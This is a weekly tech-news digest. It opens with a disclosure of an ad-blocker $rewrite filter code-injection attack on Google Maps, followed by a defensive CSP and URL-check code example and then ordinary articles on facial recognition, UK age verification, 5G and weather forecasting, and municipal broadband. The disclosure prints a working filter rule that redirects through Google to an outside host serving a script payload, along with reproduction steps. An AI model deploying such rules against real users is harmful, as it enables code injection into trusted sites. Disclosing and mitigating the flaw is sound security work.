However, web services can be exploited with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.

Extensions periodically update filters at intervals determined by filter list operators. Attacks are difficult to detect because the operator may set a short expiration time for the malicious filter list, which is then replaced with a benign one. Organizations and individuals may be targeted based on the IP addresses from which the updates are requested.

The following criteria must be met for a web service to be exploitable using this method:

1. The page must load a JS string using XMLHttpRequest or Fetch and execute the returned code
2. The page must not restrict origins from which it can fetch using Content Security Policy directives, or it must not validate the final request URL before executing the downloaded code
3. The origin of the fetched code must have a server-side open redirect or it must host arbitrary user content

Filter list operators may deliver a rule update such as this:

Code:
/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

The above rule redirects the target request to Google’s I’m Feeling Lucky search service, which then redirects to a page with the payload: alert(document.domain).

Steps for running arbitrary code on Google Maps:

1. Install either Adblock Plus, AdBlock or uBlock in a new browser profile
2. Visit the options of the extension and add the example filter list; this step is meant to simulate a malicious update to a default filter list
3. Navigate to Google Maps
4. An alert with “www.google.com” should pop up after a couple of seconds

Gmail and Google Images also meet the listed conditions to be exploitable.

Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.

Please note that the vulnerability is not limited to Google services; other web services could be affected as well.

Mitigation

The exploit can be mitigated in the affected web services by whitelisting known origins using the connect-src CSP header, or by eliminating server-side open redirects.

Ad blocking extensions should consider dropping support for the $rewrite filter option. It’s always possible to abuse the feature to some degree, even if only images or style sheets are allowed to be redirected.

Users may also switch to uBlock Origin. It does not support the $rewrite filter option and it is not vulnerable to the described attack.
https://armin.dev/blog/2019/04/adblo...ode-injection/
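
The two web-service mitigations named in the Adblock Plus article above, sketched as an added example (not code from the article, the extensions or Google): a connect-src allowlist, plus a check of the final response URL before any fetched code is executed. The policy values, the example.com hosts and all function names are constructed for illustration.

```javascript
// Added example. Hosts, paths and names below are constructed, not from the article.
const CODE_POLICY = Object.freeze({
  allowedOrigins: ['https://static.example.com'],
  allowedPathPrefixes: ['/js/'],
  allowedContentTypes: ['application/javascript', 'text/javascript'],
});

// Value for the Content-Security-Policy response header. With it in place the
// browser refuses XHR/Fetch connections to origins that are not listed, which
// removes exploitability criterion 2 (unrestricted fetch origins).
function buildCspHeader(policy) {
  return `connect-src ${policy.allowedOrigins.join(' ')}`;
}

// Decide whether a fetched response may be executed. `response` only needs the
// standard Fetch API fields `url` (the final URL after redirects) and `headers`.
function checkFetchedCode(requestedUrl, response, policy) {
  let requested;
  let final;
  try {
    requested = new URL(requestedUrl);
    final = new URL(response.url);
  } catch (err) {
    return { ok: false, reason: 'unparseable-url' };
  }
  if (final.protocol !== 'https:') {
    return { ok: false, reason: 'not-https' };
  }
  // Catches the chain from the article: same-origin rewrite, then an open
  // redirect that lands on a foreign origin.
  if (!policy.allowedOrigins.includes(final.origin)) {
    return { ok: false, reason: 'origin-not-allowed' };
  }
  // Catches rewrites to a path on an allowed origin that hosts user content.
  // URL parsing has already normalised "../" segments in the pathname.
  if (!policy.allowedPathPrefixes.some((p) => final.pathname.startsWith(p))) {
    return { ok: false, reason: 'path-not-allowed' };
  }
  // Anything other than the exact resource that was asked for is rejected.
  if (final.href !== requested.href) {
    return { ok: false, reason: 'url-changed' };
  }
  const type = (response.headers.get('content-type') || '')
    .split(';')[0].trim().toLowerCase();
  if (!policy.allowedContentTypes.includes(type)) {
    return { ok: false, reason: 'unexpected-content-type' };
  }
  return { ok: true, reason: 'ok' };
}

// Fetch a snippet and hand its text back only if every check passes.
// `fetchImpl` is injectable so the function can be exercised offline.
async function loadTrustedCode(requestedUrl, policy, fetchImpl = globalThis.fetch) {
  const response = await fetchImpl(requestedUrl, { credentials: 'omit' });
  if (!response.ok) {
    throw new Error(`HTTP ${response.status} for ${requestedUrl}`);
  }
  const verdict = checkFetchedCode(requestedUrl, response, policy);
  if (!verdict.ok) {
    throw new Error(`refusing to execute fetched code: ${verdict.reason}`);
  }
  return response.text();
}

// Constructed stand-in for a Fetch Response, used as offline sample input.
function constructedResponse(url, contentType) {
  return {
    ok: true,
    status: 200,
    url,
    headers: {
      get: (name) => (name.toLowerCase() === 'content-type' ? contentType : null),
    },
    text: async () => '/* constructed body */',
  };
}
```

The CSP header is the stronger control because the browser enforces it; the final-URL check is a second layer for code paths that execute fetched strings.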





We Built a (Legal) Facial Recognition Machine for $60
Sahil Chinoy

Most people pass through some type of public space in their daily routine — sidewalks, roads, train stations. Thousands walk through Bryant Park every day. But we generally think that a detailed log of our location, and a list of the people we’re with, is private. Facial recognition, applied to the web of cameras that already exists in most cities, is a threat to that privacy.

To demonstrate how easy it is to track people without their knowledge, we collected public images of people who worked near Bryant Park (available on their employers’ websites, for the most part) and ran one day of footage through Amazon’s commercial facial recognition service. Our system detected 2,750 faces from a nine-hour period (not necessarily unique people, since a person could be captured in multiple frames). It returned several possible identifications, including one frame matched to a head shot of Richard Madonna, a professor at the SUNY College of Optometry, with an 89 percent similarity score. The total cost: about $60.

“My first reaction was, ‘Oh my god, that is unbelievable,’” Dr. Madonna said, after we reached him and explained the experiment. “I was shocked at how readily it seems that it picked me up, because, really — it’s the side of my head.”

In our exercise, we built a database using only photos from public websites, and we obtained Dr. Madonna’s consent before publishing this story. We’ve deleted the images and data that we collected and are no longer monitoring the Bryant Park cameras.

Over decades, businesses and individuals have installed millions of cameras like the ones we used, inadvertently setting up the infrastructure for mass surveillance. In the past, a human would have to watch the video feed to identify people, making it impossible to comprehensively record everyone’s movements. But the accuracy and speed of modern facial recognition technology means that building a dragnet surveillance system is now feasible.

The law has not caught up. In the United States, the use of facial recognition is almost wholly unregulated.

“The technology has advanced faster than even I thought that it would,” said Jennifer Lynch, surveillance litigation director at the Electronic Frontier Foundation. She said that because of how quickly the technology has advanced, she would now support a wholesale ban on government use of facial recognition.

The cameras in Bryant Park were installed more than a decade ago so that people could see whether the lawn was open for sunbathing, for example, or check how busy the ice skating rink was in the winter. They are not intended to be a security device, according to the corporation that runs the park.

But our experiment shows that a person equipped with just a few cameras and facial recognition technology can learn people’s daily habits: when they arrive at the office each day, who they get coffee with, whether they left work early. When we identified Dr. Madonna, he was on his way to lunch with a job candidate — an example of how the midday outings of even law-abiding citizens can sometimes be sensitive information.

The police and governments may also have access to a vast network of cameras. Combine that with a comprehensive database of faces — like a driver’s license database — and it’s possible to track citizens throughout an entire region in real time. There is no evidence that this is happening on a wide scale in the United States. But that’s not because the technology doesn’t exist. Last year, companies claimed they could compare live feeds to a database of billions of faces.

Authorities have used facial recognition to track down criminal suspects and find missing children. But civil liberties advocates warn about the chilling effect on free speech if the government could monitor everyone’s whereabouts — or, say, identify individuals at a protest. This is not a purely hypothetical concern: During 2016 protests after Freddie Gray died in the custody of Baltimore police, law enforcement used facial recognition on social media images to identify protesters with outstanding warrants.

"Once the government has the ability to track us and identify us wherever we go, it is impossible to speak and participate in society anonymously," Ms. Lynch said.

Facial recognition in New York City

New York City is nowhere near China, where the government has installed approximately one surveillance camera for every seven citizens. But according to the A.C.L.U., police here have access to more than 9,000 camera feeds in Lower Manhattan alone.

The M.T.A. has tried using facial recognition on feeds from license-plate cameras at the city’s entry points to identify drivers through their windshields, although those efforts have been unsuccessful so far, according to The Wall Street Journal. And the Department of Transportation already has hundreds of cameras across New York City used to monitor traffic, feeds that are also streamed publicly online.

The traffic cameras are most likely too low-resolution for effective facial recognition. But the city’s LinkNYC kiosks, which are scattered through the streets and intended to provide free wireless internet, each have two security cameras. Law enforcement agencies need a subpoena or court order to gain access to the footage, and using facial recognition is against the policy of the company that owns the kiosks. However, the existence of more than 3,000 additional cameras has raised concerns about their potential to bolster the city’s surveillance capabilities.

Details are sparse, but there is evidence that those capabilities are formidable. The Police Department claims its Domain Awareness System, developed jointly with Microsoft (which also offers facial recognition software), “utilizes the largest network of cameras, license plate readers, and radiological sensors in the world.”

It’s unclear whether the Domain Awareness System currently uses facial recognition, though the Police Department experimented with it in 2012, according to Clare Garvie, an associate at the Center on Privacy and Technology at Georgetown Law School. The police have been reluctant to divulge details, and the center has sued the department for more information.

“We compare facial images picked up by cameras at crime scenes to mugshots in law enforcement records,” said Sgt. Jessica McRorie, a spokeswoman for the department, in an emailed statement. “We do not engage in mass or random collection of facial records from N.Y.P.D. camera systems, the internet, or social media.”

Law enforcement use of the technology

Amazon is one of several companies, including Google and Microsoft, that sell facial recognition services to the public. The company has highlighted positive applications of the service we used, Rekognition, such as its ability to help find lost children. It insists that it requires customers comply with the law and respect others’ rights, but has been criticized for pushing its technology to law enforcement agencies.

Rekognition is already actively used by the sheriff’s office in Washington County, Ore., including to investigate minor crimes like shoplifting. The Orlando, Fla., Police Department is also using the technology in a pilot program.

Amazon notes that its service makes predictions, not decisions, and that the confidence level the service provides should be incorporated in a human review process. The company recommends using a threshold of at least 99 percent for applications of its facial recognition service that involve identification or public safety, though critics of the technology say that the scoring is opaque and that the company has no way of enforcing that threshold. None of the matches we obtained from the Bryant Park footage, correct or incorrect, met the threshold.

Matt Wood, the general manager of artificial intelligence for Amazon Web Services, noted that it is possible that Rekognition, like other types of information available to law enforcement officials, could be used inappropriately. “The law enforcement agency will have to be accountable to these individuals and to the law if they violate people’s civil liberties,” he said. He added that the company has not received any reports of misuse by law enforcement.

In January, however, the A.C.L.U. sent a letter to Amazon asking it to stop selling facial recognition technology to police and government agencies, saying that the company’s attention to civil liberties has lagged behind that of Google and Microsoft.

“Rekognition marketing materials read like a user manual for authoritarian surveillance,” said Nicole Ozer, the technology and civil liberties director for the A.C.L.U. of California, in a statement last year.

Regulate or ban?

In the United States, there are no federal laws that restrict the use of facial recognition. Most states don’t have regulations, nor does New York City, though a city councilman proposed legislation last year that would require businesses to disclose their use of the technology. That would apply to our exercise, but would not extend to law enforcement’s use of facial recognition.

“It’s kind of like a wild, wild west out there,” Ms. Lynch, the E.F.F. lawyer, said.

The lack of regulation has opened the door to a wide range of applications. In 2007, an Arizona sheriff’s office enrolled all of Honduras’s driver’s licenses and mugshots into its database, and a Florida sheriff’s office runs 8,000 searches each month without requiring its officers to have reasonable suspicion of a crime, according to the Georgetown report.

The Georgetown center along with the E.F.F. and others have proposed regulations, including requiring that authorities have reasonable suspicion before conducting a search; prohibiting, except in life-or-death situations, live facial recognition searches using driver’s license databases; and forbidding tracking individuals based on political beliefs, race or religion.

Amazon itself has called for a legal framework that incorporates human review and transparency. But some say that the technology is so dangerous that no regulation is sufficient.

“The future of human flourishing depends upon facial recognition technology being banned,” wrote Woodrow Hartzog, a professor of law and computer science at Northwestern, and Evan Selinger, a professor of philosophy at R.I.T., last year. “Otherwise, people won’t know what it’s like to be in public without being automatically identified, profiled, and potentially exploited.”

Facial recognition is categorically different from other forms of surveillance, Mr. Hartzog said, and uniquely dangerous. Faces are hard to hide and can be observed from far away, unlike a fingerprint. Name and face databases of law-abiding citizens, like driver’s license records, already exist. And for the most part, facial recognition surveillance can be set up using cameras already on the streets.

It might be too late for a moratorium or ban, however. Facial recognition is already being used by police departments around the country, Ms. Garvie said.

“We can’t lock law enforcement agencies into 20th-century technology just because 21st-century technology raises very serious risks,” she said.

Dr. Madonna, the person we identified, said he understood that tension. He was initially astonished when we reached out to him, but he said that as a doctor, he often talks to students about the ratio of risk to benefit. He saw the tremendous benefits that facial recognition could offer, he said.

But the technology is open to abuse, he added, when individuals or governments can use facial recognition to track any group, or just about any ordinary citizen — even someone walking through Bryant Park.
https://www.nytimes.com/interactive/...york-city.html





Online Pornography Age Checks to be Mandatory in UK from 15 July

Sites that fail to verify users are over 18 face being blocked under controversial laws
Alex Hern

The UK’s age verification system for online pornography will become mandatory on 15 July, the government has confirmed.

From that date, commercial providers of online pornography will be required to carry out “robust” age verification checks on users, in order to keep children from accessing adult content.

Websites that refuse to implement the checks face being blocked by UK internet service providers or having their access to payment services withdrawn.

The digital minister, Margot James, welcomed the introduction of the rules, saying: “Adult content is currently far too easy for children to access online. The introduction of mandatory age verification is a world first, and we’ve taken the time to balance privacy concerns with the need to protect children from inappropriate content. We want the UK to be the safest place in the world to be online, and these new laws will help us achieve this.”

Will Gardner, the chief executive of Childnet, said: “We hope that the introduction of this age verification will help in protecting children, making it harder for young people to accidentally come across online pornography, as well as bringing in the same protections that we use offline to protect children from age-restricted goods or services.”

Some campaigners have criticised the laws’ potential effectiveness. The government was forced to exempt large social media sites from the ban owing to fears that a strict implementation would result in sites including Twitter, Reddit, Imgur and Tumblr being blocked for adult content.

Additionally, concerns have been raised that the laws could result in the creation of a database of the UK’s porn viewers, which would pose a privacy problem if it were to ever leak.

Unfortunately for the government’s attempts to calm fears on the privacy issue, the news was announced by the Department for Digital, Culture, Media, and Sport in an email that exposed the contact details of almost 300 recipients. DCMS was also responsible for implementing the new GDPR laws in the UK, which mandate large financial penalties for breaches that expose personal data.

Jim Killock, the executive director of the Open Rights Group, said: “The government needs to compel companies to enforce privacy standards. The idea that they are ‘optional’ is dangerous and irresponsible. Having some age verification that is good and other systems that are bad is unfair and a scammer’s paradise – of the government’s own making.”

He added: “Data leaks could be disastrous, and they will be the government’s own fault. The government needs to shape up and legislate for privacy before their own policy results in people being outed, careers destroyed or suicides being provoked.”
https://www.theguardian.com/technolo...k-from-15-july





Porn Sites Offer Loopholes to Get Around Web Ban As BBFC Admits it is Powerless to Stop Tech Savvy Teens

Charles Hymas, Mike Wright

Porn websites are highlighting loopholes in the ban on under-18s accessing them, as the watchdog admitted it will be powerless to stop tech-savvy teenagers circumventing it.

The regulator acknowledged virtual private networks (VPNs) will allow users to evade age verification checks from July 15 by allowing under-aged users to create ghost accounts abroad that can access the porn sites.

Although most VPNs require payment, MindGeek, the firm behind some of the world’s largest porn sites, has already released its own free VPN service, VPNHub, which allows users to disguise their location.

Last year it advertised the service with the claim that it would let the user “access all websites and apps securely and privately at home, school, work or from anywhere in the world.”

That description has now been changed, but on Apple’s App Store, VPNHub boasts it will “mask your true location by routing your data through our full stack of global encrypted servers”.

The app is currently available on Google and Apple app stores although MindGeek claimed it would not be available in UK app stores without age verification once the ban came into effect.

Asked about the prospect of children using VPNs, the British Board of Film Classification (BBFC), the regulator, admitted age-verification is "not a silver bullet."

A spokesman added: “Determined teenagers will find ways to access pornography. However, it will mean young children can no longer stumble across porn on commercial pornographic websites.”

Experts also warned that anyone using VPNs risked exploitation of their personal data as controls on privacy and commercial use tended to be more lax.

The Government estimates 1.4 million children a month access porn sites. From July 15, anyone who visits a porn site from a British IP address will be asked for “proof” they are 18, which they can obtain from third-party age verification firms or cards that can be bought in shops for £4.99.

Experts anticipate the cards or codes that adults obtain from age verification firms are likely to end up being traded among prospective under-aged users.

The BBFC is to closely monitor messaging and social media sites such as Reddit, Tumblr and Flickr which are not covered by the legislation but provide a potential route for young users to access porn. It will report in a year on whether further legislative action might be needed.

With five million porn sites worldwide, the BBFC admits it will have to concentrate enforcement on the most popular porn sites that refuse to comply with the law, which is likely to leave smaller operations open to savvy younger users.

Jim Killock, executive director of the Open Rights Group, said he was particularly worried about torrent file-sharing sites where people can already download pirate copies of films and porn.

“These are semi-criminal operations that flout the law because they don’t give a hoot. They are breaking the law by sharing content anyway so they are not going to care about age verification,” he said.

Myles Jackman, a lawyer expert on pornography legislation, said: “The community that is supposed to be most protected are the most tech literate and will be able to circumvent these rules.”

The BBFC said it would report in a year on the effectiveness of the regime “including highlighting any changes in technology and will recommend additional or alternative means of achieving the child protection goals of the legislation.”
https://www.telegraph.co.uk/news/201...its-powerless/





How 5G is Likely to Put Weather Forecasting at Risk
Dan Maloney

If the great Samuel Clemens were alive today, he might modify the famous meteorological quip often attributed to him to read, “Everyone complains about weather forecasts, but I can’t for the life of me see why!” In his day, weather forecasting was as much guesswork as anything else, reading the clouds and the winds to see what was likely to happen in the next few hours, and being wrong as often as right. Telegraphy and better instrumentation made forecasting more scientific and improved accuracy steadily over the decades, to the point where we now enjoy 10-day forecasts that are at least good for planning purposes and three-day outlooks that are right about 90% of the time.

What made this increase in accuracy possible is supercomputers running sophisticated weather modeling software. But models are only as good as the raw data that they use as input, and increasingly that data comes from on high. A constellation of satellites with extremely sensitive sensors watches the planet, detecting changes in winds and water vapor in near real-time. But if the people tasked with running these systems are to be believed, the quality of that data faces a mortal threat from an unlikely foe: the rollout of 5G cellular networks.

Where’s the Water?

To understand how a new generation of wireless technology can deleteriously impact weather forecasting, it helps to take a look at exactly what powers the weather, and what these satellites are looking at. Our weather is largely the result of differences between air masses. Pressure, temperature, and moisture, each determined by energy inputs from the Sun, all team up in a complex manner to determine where and when clouds will form and which direction the winds will come from. Remotely sensing these differences is the key to accurately forecasting the weather.

The satellites that watch our weather are largely passive sensor platforms that measure the energy reflected or emitted by objects below them. They gather data on temperature and moisture — pressure is still measured chiefly by surface measurements and by radiosondes — by looking at the planet in different wavelengths. Temperature is measured mainly in the optical wavelengths, both visible and infrared, but water vapor is a bit harder to measure. That’s where microwaves come in, and where weather prediction stands to run afoul of the 5G rollout.

Everything on Earth – the plants, the soil, the surface water, and particularly the gases in the atmosphere – both absorb and, to a lesser degree, emit microwave radiation. Measuring those signals from space is the business of satellites carrying microwave radiometers, essentially sensitive radio receivers tuned to microwave frequencies. By looking at the signals received at different wavelengths, and by adding in information about the polarization of the signal, microwave radiometry can tell us what’s going on within a vertical column of the atmosphere.

For water vapor, 23.8-GHz turns out to be very useful, and very much in danger of picking up interference from 5G, which will use frequencies very close to that. Since microwave radiometers are passive receivers, they’ll see pretty much everything that emits microwave signals in that range, like the thousands of cell sites that will be needed to support a full 5G rollout. Losing faint but reliable water vapor signals in a sea of 5G noise is the essential problem facing weather forecasters, and it’s one they’ve faced before.

Real World Consequences

At the 2019 annual meeting of the American Meteorological Society, Sidharth Misra, a research engineer at NASA’s Jet Propulsion Laboratory, presented data showing how commercial enterprises can have unintended consequences on the scientific community. Between 2004 and 2007, satellite-based microwave radiometers detected an increase in noise in a curious arc across the top of the United States. A similar signal was detected by another satellite, with the addition of huge signals being returned from the waters off each coast and the Great Lakes. The signals turned out to be reflections from geosynchronous direct TV satellites, bouncing off the surface and swamping the water vapor signals the weather satellites were trying to measure.

But surely the scientists are overreacting, right? Can losing one piece of data from as complex a puzzle as weather prediction really have that much of an impact? Probably yes. The water vapor data returned by microwave radiometers like the Advanced Microwave Sounding Unit (AMSU) aboard a number of weather satellites is estimated to reduce the error of weather forecasts by 17%, the largest contributor by far among a group of dozens of other modalities.

The loss of microwave water vapor data could have catastrophic real-world consequences. In late October of 2012, as Hurricane Sandy barreled up the East coast of the United States, forecasts showed that the storm would take a late turn to the northwest and make landfall in New Jersey. An analysis of the forecast if the microwave radiometer data had not been available showed the storm continuing in a wide arc and coming ashore in the Gulf of Maine. The availability of AMSU data five days in advance of the storm’s landfall bought civil authorities the time needed to prepare, and probably reduced the casualties caused by the “Storm of the Century”, still the deadliest storm of the 2012 season.

Auction Time

So exactly where are we with this process? The FCC auction of licenses for the Upper Microwave Flexible Use Service (UMFUS), which offers almost 3000 licenses in the 24-GHz band, began on March 14, 2019, despite a letter from NASA Administrator Jim Bridenstine and Secretary of Commerce Wilbur Ross requesting that it be delayed. FCC Chairman Ajit Pai rejected the request, stating that there was an “absence of any technical basis for the objection.”

Will the 5G rollout negatively impact weather forecasts? It’s not clear. Licensees are required to limit out-of-band emissions, but with so many 5G sites needed to cover the intended service areas, and with the critical 23.8-GHz water vapor frequency so close to the UMFUS band, there’s not much room for error. And once the 5G cat is out of the bag, it’ll be difficult to protect that crucial slice of the microwave spectrum.

Whatever happens, it doesn’t look good for weather forecasting. The UMFUS auction proceeds apace, and has raised almost $2 billion so far. Companies willing to spend that much on spectrum will certainly do whatever it takes to realize their investment, and in the end, not only will science likely suffer, but lives may be put at risk for the sake of 5G as our toolset for predicting dangerous weather faces this new data-gathering challenge.
https://hackaday.com/2019/04/16/5g-b...sting-at-risk/





Report: 26 States Now Ban or Restrict Community Broadband

Many of the laws restricting local voters’ rights were directly written by a telecom sector terrified of real broadband competition.
Karl Bode

A new report has found that 26 states now either restrict or outright prohibit towns and cities from building their own broadband networks. Quite often the laws are directly written by the telecom sector, and in some instances ban towns and cities from building their own broadband networks—even if the local ISP refuses to provide service.

The full report by BroadbandNow, a consumer-focused company that tracks US broadband availability, indicates the total number of state restrictions on community broadband has jumped from 20 such restrictions since the group’s last report in 2018.

Frustrated by slow speeds, limited availability, high prices and terrible customer service, more than 750 communities across the country have built their own broadband ISPs or cooperatives. Studies have shown these locally owned and operated networks tend to offer lower prices, faster speeds, and better customer service than their private-sector counterparts.

Instead of competing by offering better service, private sector telecom giants like Comcast and AT&T have routinely turned to a cheaper alternative: easily corrupted state lawmakers. In exchange for campaign contributions, lawmakers frequently and uncritically pass on model legislation written by industry and distributed by organizations like ALEC.

Often the restrictions are buried in other, unrelated legislation to try and avoid public scrutiny. For example in 2016, AT&T lobbyists attempted to include community broadband restrictions in a bill intended to address regional traffic issues.

BroadbandNow’s report looks at each state’s restrictions individually, and found that while some states simply banned community broadband outright (a notable assault on voters’ democratic rights), others impose clever but onerous restrictions on precisely how a local network can be funded, who they can partner with, or how quickly (and where) they’re allowed to grow.

In Tennessee, for example, state laws allow publicly-owned electric utilities to provide broadband, “but limits that service provision to within their electric service areas.” Such restrictions have made it hard for EPB—the highest rated ISP in America last year according to Consumer Reports—to expand service into new areas.

“During the 2017 legislative session, a bill considered by state lawmakers would have enabled municipalities to expand broadband infrastructure to residents,” the report notes. “Instead, lawmakers passed a bill that offers $45 million in subsidies to private Internet service providers to build the same infrastructure.”

The problem: throwing taxpayer subsidies at private ISPs often doesn't fix the problem. A recent study by the Institute For Local Self-Reliance (ILSR) found that a combination of terrible broadband maps, local and federal corruption, and regulatory apathy often means funds are doled out to companies that not only fail to follow through with deployment, but face no meaningful government repercussions for not doing so.

Community broadband isn’t a magical panacea, and like any effort it depends on the viability of the underlying business model. But such efforts can often motivate private ISPs to improve local prices and service, as Comcast was forced to do in Tennessee.

“In a time when communities need as much investment as possible to build strong economies, these states are more focused on protecting the monopolies that are investing too little,” ILSR’s Christopher Mitchell told Motherboard in an email. “Many of these states are actually using taxpayer dollars to subsidize privately owned networks when they will not let local taxpayers decide to build their own network—which is often done at no cost to the taxpayer!”

Mitchell said his own organization pegs the total number of hard state-level restrictions at around 20 states, and argued the state-level restrictions serve no valid purpose outside of protecting natural telecom monopoly revenues from democratic disruption.

“There is no legitimate justification to limit local authority to build essential infrastructure,” Mitchell said. “Even where a community is supposedly well-served by a cable monopoly, [the local community-run ISP is] the most knowledgeable and where additional investment is needed.”

You’d be hard pressed to find many consumers who believe that a Comcast-written law should supplant their local voting rights as it pertains to local infrastructure, even if they don’t agree that their town or city should pursue the option. But ISP lobbyists and lawmakers have grown adept over the years at obscuring such efforts from public scrutiny.

“Unfortunately, despite how unpopular these restrictions are with certain community members, they remain very under-the-radar to the public at large,” Tyler Cooper, consumer policy expert and editor at BroadbandNow, told Motherboard.

Cooper noted that the only way to thwart such efforts is for consumers to pay closer attention and get involved with politics at a “hyper local level.”

“Community members can get engaged with the regulatory process in their home state, telling their representatives that they want municipal broadband to be available to as many residents as possible,” Cooper said. “Showing up in groups to town hall meetings can really move the needle. Many of the anti-muni laws can be overcome if enough community support is present,” he said.
https://motherboard.vice.com/en_us/a...nity-broadband





Werner Herzog Says If You Can’t Find His Films Legally, Go Ahead And Pirate Them
Matt Prigge

Werner Herzog has led a charmed life, from frequently avoiding death while making his singular films to getting semi-randomly cast in popcorn fare like Jack Reacher (as the villain!) to continuing an interview after being shot in the belly by a stray BB gun. Also remember that time he popped up on Parks and Recreation? So we’ll see what his new bosses at Disney, who allowed him to be cast in the forthcoming Star Wars show The Mandalorian, have to say about his latest bold statement, namely that pirating movies? To him it’s fine.

As per The Independent, the filmmaker/actor/madman — who almost went crazy filming Fitzcarraldo in the Amazon Basin and once rescued Joaquin Phoenix from a car accident — was speaking at the Vision in Nyon film festival in Switzerland when Ukrainian producer Illia Gladshtein mentioned she was only able to find his noted films on illegal download sites.

“Piracy has been the most successful form of distribution worldwide,” Herzog responded. He clarified that he, of course, likes being paid, but if a film of his is not available via proper channels, then, you know, go with God. “If someone like you steals my films through the internet or whatever, fine, you have my blessing.”
https://uproxx.com/movies/werner-her...-distribution/

















Until next week,

- js.




















Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.


"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black